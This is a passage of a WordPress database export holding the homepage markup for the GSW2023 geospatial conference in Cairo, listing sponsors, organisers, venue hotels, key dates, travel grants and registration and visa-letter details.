(4657,1,'2023-06-09 21:19:40','2023-06-09 21:19:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 